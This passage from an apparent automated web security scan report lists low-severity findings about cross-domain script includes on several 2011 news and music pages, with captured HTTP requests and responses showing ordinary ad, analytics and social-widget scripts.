<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
<!-- End Quantcast tag -->

<script src="http://static.getclicky.com/68525.js" type="text/javascript"></script>
...[SNIP]...
</noscript>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
16.21. http://www.facebook.com/plugins/comments.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/comments.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /plugins/comments.php?api_key=c87f9494a93b2590633af39d1b8e347f&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2fb777bd4%26origin%3Dhttp%253A%252F%252Fwww.indianasnewscenter.com%252Ff208516ccc%26relation%3Dparent.parent%26transport%3Dpostmessage&href=www.indianasnewscenter.com%2Fnews%2Flocal%2FAt-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html&locale=en_US&numposts=25&sdk=joey&width=630 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.indianasnewscenter.com/news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.120.114
X-Cnection: close
Date: Mon, 09 May 2011 13:59:16 GMT
Content-Length: 14072

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y5/r/Z6PtFE_aVAz.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
16.22. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /plugins/like.php?href=http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story&layout=button_count&show_faces=true&width=135&action=recommend&font&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.120.130
X-Cnection: close
Date: Mon, 09 May 2011 13:59:33 GMT
Content-Length: 7014

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/7NS4A3NTFw2.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
16.23. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Firishtimestheticket&width=300&colorscheme=light&connections=10&stream=false&header=false&height=270 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.irishtimes.com/newspaper/theticket/2011/0506/1224296203710.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.80.104
X-Cnection: close
Date: Mon, 09 May 2011 14:04:05 GMT
Content-Length: 12967

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
16.24. http://www.indianasnewscenter.com/news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.indianasnewscenter.com
Path:   /news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html HTTP/1.1
Host: www.indianasnewscenter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 09 May 2011 13:49:37 GMT
Vary: Accept-Encoding
X-Server-Name: dv-c1-r2-u24-b9
Content-Type: text/html;charset=utf-8
Date: Mon, 09 May 2011 13:59:02 GMT
Connection: close
Set-Cookie: click_mobile=0
Content-Length: 71453

               
                                                                               <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head>
<title>

   
                                   At Noon: Casey A
...[SNIP]...
</script>
<script type="text/javascript" src="http://pixel.quantserve.com/seg/p-9a3CzpxOy4iiQ.js"></script>
...[SNIP]...
<body class="parentnews path-news-local article" id="entry-121488004">
<script id="aptureScript" type="text/javascript" src="http://www.apture.com/js/apture.js?siteToken=pgKiQTB" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#appId=c87f9494a93b2590633af39d1b8e347f&amp;xfbml=1"></script>
...[SNIP]...
</a><script type='text/javascript' src='http://platform.twitter.com/widgets.js'></script>
...[SNIP]...
</a><script src='http://static.ak.fbcdn.net/connect.php/js/FB.Share' type='text/javascript'></script>
...[SNIP]...
</div><script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
16.25. http://www.irishtimes.com/newspaper/theticket/2011/0506/1224296203710.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.irishtimes.com
Path:   /newspaper/theticket/2011/0506/1224296203710.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /newspaper/theticket/2011/0506/1224296203710.html HTTP/1.1
Host: www.irishtimes.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 100
Date: Mon, 09 May 2011 13:59:03 GMT
Expires: Mon, 09 May 2011 14:04:03 GMT
Cache-Control: max-age = 300
Connection: Keep-Alive
Via: NS-CACHE-6.0: 101
ETag: "12c78d-f63a-4dc7eff3"
Server: Apache
Last-Modified: Mon, 09 May 2011 13:45:23 GMT
Accept-Ranges: bytes
Keep-Alive: timeout=300, max=1994
Content-Type: text/html; charset=US-ASCII
Cache-Control: private
Content-Length: 63034

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=US-ASC
...[SNIP]...
</script><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=irishtimes"></script>
...[SNIP]...
</script><script xmlns="http://www.w3.org/1999/xhtml" language="javascript" type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"><!--Batch Build Fix: Comment added so script is recognised-->
...[SNIP]...
<!-- End SiteCatalyst code version: H.15.1. --><script xmlns="http://www.w3.org/1999/xhtml" type="text/javascript" src="http://t.bmmetrix.com/ie/irishtimes_ie/bmv13.js"><!-- BlueMetrics JS code -->
...[SNIP]...
16.26. http://www.nme.com/news/sufjan-stevens/56527  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nme.com
Path:   /news/sufjan-stevens/56527

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/sufjan-stevens/56527 HTTP/1.1
Host: www.nme.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
NmeAkamaiMatch: 1
IgniteAkamaiMatch: 1
X-Wf-Protocol-1: http://meta.wildfirehq.org/Protocol/JsonStream/0.2
X-Wf-1-Plugin-1: http://meta.firephp.org/Wildfire/Plugin/FirePHP/Library-FirePHPCore/0.3
X-Wf-1-Structure-1: http://meta.firephp.org/Wildfire/Structure/FirePHP/FirebugConsole/0.1
X-Wf-1-1-1-1: 55|[{"Type":"LOG"},"now: Mon, 09 May 2011 15:00:36 +0100"]|
X-Wf-1-1-1-2: 63|[{"Type":"LOG"},"id: 56830e3f97674f92659a8a7e54b9b44fea17850e"]|
X-Wf-1-1-1-3: 23|[{"Type":"LOG"},"li: "]|
X-Wf-1-1-1-4: 24|[{"Type":"LOG"},"cs: 1"]|
X-Wf-1-1-1-5: 23|[{"Type":"LOG"},"rc: "]|
X-Wf-1-1-1-6: 24|[{"Type":"LOG"},"ic: 1"]|
X-Wf-1-1-1-7: 28|[{"Type":"LOG"},"ttl: 3560"]|
X-Wf-1-1-1-8: 29|[{"Type":"LOG"},"mu: 786432"]|
X-Wf-1-1-1-9: 41|[{"Type":"LOG"},"ts: 0.0014510154724121"]|
X-Wf-1-1-1-10: 25|[{"Type":"LOG"},"ct: us"]|
Content-Type: text/html
Vary: Accept-Encoding
Expires: Mon, 09 May 2011 14:00:37 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 14:00:37 GMT
Connection: close
Set-Cookie: ServerID=1043; path=/
Set-Cookie: PHPSESSID=nb14qm2u5j3cpt8fp8muap0hh1; path=/; domain=.nme.com
Set-Cookie: ignite_loggedin=false; expires=Wed, 08-Jun-2011 14:00:36 GMT; path=/; domain=.nme.com
Set-Cookie: browsertype=web; expires=Tue, 10-May-2011 14:00:37 GMT; path=/; domain=.nme.com
Content-Length: 62535

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://cdn.krxd.net/krux.js"></script>
...[SNIP]...
</script>
   <script language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</div>
       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.co.uk/cse/brand?form=header-search-box&amp;lang=en"></script>
<script type="text/javascript" src="http://www.google.co.uk/cse/brand?form=footer-search-box&amp;lang=en"></script>
...[SNIP]...
16.27. http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orlandosentinel.com
Path:   /business/os-cfb-cover-casey-tv-20110509,0,6839926.story

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /business/os-cfb-cover-casey-tv-20110509,0,6839926.story HTTP/1.1
Host: www.orlandosentinel.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
P3P: policyref="http://www.orlandosentinel.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE"
Content-Type: text/html; charset=UTF-8
X-Instance-Name: i7s30z1n1
Last-Modified: Mon, 09 May 2011 13:58:29 GMT
Vary: Accept-Encoding
Cache-Control: private, max-age=142
Date: Mon, 09 May 2011 13:59:15 GMT
Connection: close
Content-Length: 227706


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//E
...[SNIP]...
<div class="ad centerAd topLeaderboard">
           <script language="JavaScript" src="http://ad.doubleclick.net/adj/trb.orlandosentinel/biz;;ptype=s;slug=os-cfb-cover-casey-tv-20110509;rg=ur;pos=T;dcopt=ist;sz=728x90;tile=1;ca=Television;en=TwitterInc;at=Television;at=ArtsandCulture;at=MassMedia;at=CrimeLawandJustice;at=Trials;u=http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story;ord=77756451?" type="text/javascript"></script>
...[SNIP]...
</a>
               <script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</span>
               
               <script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...
<div id="story-leftrail-ad">
    <script language="JavaScript" src="http://ad.doubleclick.net/adj/trb.orlandosentinel/biz;;ptype=s;slug=os-cfb-cover-casey-tv-20110509;rg=ur;pos=2;sz=234x60;tile=2;ca=Television;en=TwitterInc;at=Television;at=ArtsandCulture;at=MassMedia;at=CrimeLawandJustice;at=Trials;u=http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story;ord=77756451?" type="text/javascript"></script>
...[SNIP]...
</a>
               <script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</span>
               
               <script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...
<td vAlign="middle">

<script language="JavaScript" src="http://ad.doubleclick.net/adj/trb.orlandosentinel/biz;;ptype=s;slug=os-cfb-cover-casey-tv-20110509;rg=ur;pos=1;sz=300x250,336x280;tile=3;ca=Television;en=TwitterInc;at=Television;at=ArtsandCulture;at=MassMedia;at=CrimeLawandJustice;at=Trials;u=http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story;ord=77756451?" type="text/javascript"></script>
...[SNIP]...
<div id="fbfan"><script language="javascript" type="text/javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US"></script>
...[SNIP]...
<div class="module blurb ">
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
<div class="module blurb ">
<script src="http://admatch-syndication.mochila.com/js/mochilaCompositeWidget.js"></script>
...[SNIP]...
<div class="skyScraper">
       
<script language="JavaScript" src="http://ad.doubleclick.net/adj/trb.orlandosentinel/biz;;ptype=s;slug=os-cfb-cover-casey-tv-20110509;rg=ur;pos=1;sz=160x600,300x600;tile=4;ca=Television;en=TwitterInc;at=Television;at=ArtsandCulture;at=MassMedia;at=CrimeLawandJustice;at=Trials;u=http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story;ord=77756451?" type="text/javascript"></script>
...[SNIP]...
<div class="ad centerAd">

<script language="JavaScript" src="http://ad.doubleclick.net/adj/trb.orlandosentinel/biz;;ptype=s;slug=os-cfb-cover-casey-tv-20110509;rg=ur;pos=B;sz=728x91;tile=5;ca=Television;en=TwitterInc;at=Television;at=ArtsandCulture;at=MassMedia;at=CrimeLawandJustice;at=Trials;u=http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story;ord=77756451?" type="text/javascript"></script>
...[SNIP]...
<div id="inlineHeaderAd" style="position:absolute; top: 35px; right: 10px; height: 64px;">
<script language="JavaScript" src="http://ad.doubleclick.net/adj/trb.orlandosentinel/biz;;ptype=s;slug=os-cfb-cover-casey-tv-20110509;rg=ur;pos=1;sz=234x60;tile=6;ca=Television;en=TwitterInc;at=Television;at=ArtsandCulture;at=MassMedia;at=CrimeLawandJustice;at=Trials;u=http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story;ord=77756451?" type="text/javascript"></script>
...[SNIP]...
<!-- Tacoda Javascript -->

<SCRIPT SRC="http://an.tacoda.net/an/g10007/slf.js" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...
<!-- START REVENUE SCIENCE PIXELLING CODE -->
<script src="http://js.revsci.net/gateway/gw.js?csid=B08725"></script>
...[SNIP]...
16.28. http://www.orlandosentinel.com/business/transparent  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orlandosentinel.com
Path:   /business/transparent

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /business/transparent HTTP/1.1
Host: www.orlandosentinel.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mainPage=/business

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
P3P: policyref="http://www.orlandosentinel.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE"
Content-Location: http://www.orlandosentinel.com/hive/error/notfound.jsp
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Cache-Control: private, max-age=180
Date: Mon, 09 May 2011 13:59:31 GMT
Connection: close
Content-Length: 130184


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
   <meta http-equiv="X-UA-Compatible" con
...[SNIP]...
</script>
   <script language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...
<!-- Tacoda Javascript -->

<SCRIPT SRC="http://an.tacoda.net/an/g10007/slf.js" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...
<!-- START REVENUE SCIENCE PIXELLING CODE -->
<script src="http://js.revsci.net/gateway/gw.js?csid=B08725"></script>
...[SNIP]...
16.29. http://www.orlandosentinel.com/hive/common/includes/google-adsense-content-orlnews.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orlandosentinel.com
Path:   /hive/common/includes/google-adsense-content-orlnews.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /hive/common/includes/google-adsense-content-orlnews.html?client=ca-tribune_news3_html&google_ad_channel=Orlandosentinel_story_pos1&type=wide&page_url=http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,2290449,print.story HTTP/1.1
Host: www.orlandosentinel.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mainPage=/business; __switchTo5x=97; __unam=23536f-12fd50e4220-5f39d80-1

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html
P3P: policyref="http://www.orlandosentinel.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE"
Expires: Mon, 09 May 2011 13:59:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 09 May 2011 13:59:32 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 4445

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<title>Google Ads</title>
<link href="/hive/stylesheets/sponsoredlinks-orlnews.css" media="all
...[SNIP]...
</script>
<script language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
16.30. http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thevine.com.au
Path:   /music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx HTTP/1.1
Host: www.thevine.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=kxuwnfahnyntrb45nyzhom55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 269864


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><t
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://whistleout.s3.amazonaws.com/public/css/widget-v3/widget_vine_625x125.css" />

<script type="text/javascript" src="http://whistleout.s3.amazonaws.com/public/script/widget/widget.js"></script>
...[SNIP]...
</div>


<script type="text/javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US"></script>
...[SNIP]...
<!-- begin ad tag (tile=1) -->
<script language="JavaScript" src="http://ad-apac.doubleclick.net/adj/onl.vine/music/blogs;kw=;cat=music;cat1=blogs;ctype=articles;skin=default;adtype=panorama;pos=1;tile=1;dcopt=ist;sz=468x60,728x90;ord=100511120053?" type="text/javascript"></script>
...[SNIP]...
<!-- begin ad tag (tile=10) -->
<script language="JavaScript" src="http://ad-apac.doubleclick.net/adj/onl.vine/music/blogs;kw=;cat=music;cat1=blogs;ctype=articles;skin=default;adtype=panorama;pos=top;tile=2;sz=120x30;ord=100511120053?" type="text/javascript"></script>
...[SNIP]...
<!-- begin ad tag (tile=7) -->
<script language="JavaScript" src="http://ad-apac.doubleclick.net/adj/onl.vine/music/blogs;kw=;cat=music;cat1=blogs;ctype=articles;skin=default;adtype=panorama;pos=top;tile=3;sz=940x1;ord=100511120053?" type="text/javascript"></script>
...[SNIP]...
<!-- begin ad tag (tile=9) -->
<script language="JavaScript" src="http://ad-apac.doubleclick.net/adj/onl.vine/music/blogs;kw=;cat=music;cat1=blogs;ctype=articles;skin=default;adtype=panorama;pos=top;tile=4;sz=290x50;ord=100511120053?" type="text/javascript"></script>
...[SNIP]...
<!-- begin ad tag (tile=2) -->
<script language="JavaScript" src="http://ad-apac.doubleclick.net/adj/onl.vine/music/blogs;kw=;cat=music;cat1=blogs;ctype=articles;skin=default;adtype=island;pos=1;tile=5;sz=300x250;ord=100511120053?" type="text/javascript"></script>
...[SNIP]...
<!-- begin ad tag (tile=5) -->
<script language="JavaScript" src="http://ad-apac.doubleclick.net/adj/onl.vine/music/blogs;kw=;cat=music;cat1=blogs;ctype=articles;skin=default;pos=1;tile=6;sz=295x60;ord=100511120053?" type="text/javascript"></script>
...[SNIP]...
<!-- begin ad tag (tile=5) -->
<script language="JavaScript" src="http://ad-apac.doubleclick.net/adj/onl.vine/music/blogs;kw=;cat=music;cat1=blogs;ctype=articles;skin=default;pos=2;tile=7;sz=295x60;ord=100511120053?" type="text/javascript"></script>
...[SNIP]...
<!-- begin ad tag (tile=2) -->
<script language="JavaScript" src="http://ad-apac.doubleclick.net/adj/onl.vine/music/blogs;kw=;cat=music;cat1=blogs;ctype=articles;skin=default;adtype=island;pos=2;tile=8;sz=300x250;ord=100511120053?" type="text/javascript"></script>
...[SNIP]...
<!-- begin ad tag (tile=1) -->
<script language="JavaScript" src="http://ad-apac.doubleclick.net/adj/onl.vine/music/blogs;kw=;cat=music;cat1=blogs;ctype=articles;skin=default;adtype=panorama;pos=2;tile=9;sz=468x60,728x90;ord=100511120053?" type="text/javascript"></script>
...[SNIP]...
<!-- begin ad tag (tile=8) -->
<script language="JavaScript" src="http://ad-apac.doubleclick.net/adj/onl.vine/music/blogs;kw=;cat=music;cat1=blogs;ctype=articles;skin=default;adtype=panorama;pos=top;tile=10;sz=1x11;ord=100511120053?" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-au.imrworldwide.com/v53.js"></script>
...[SNIP]...
17. File upload functionality  previous  next

Summary

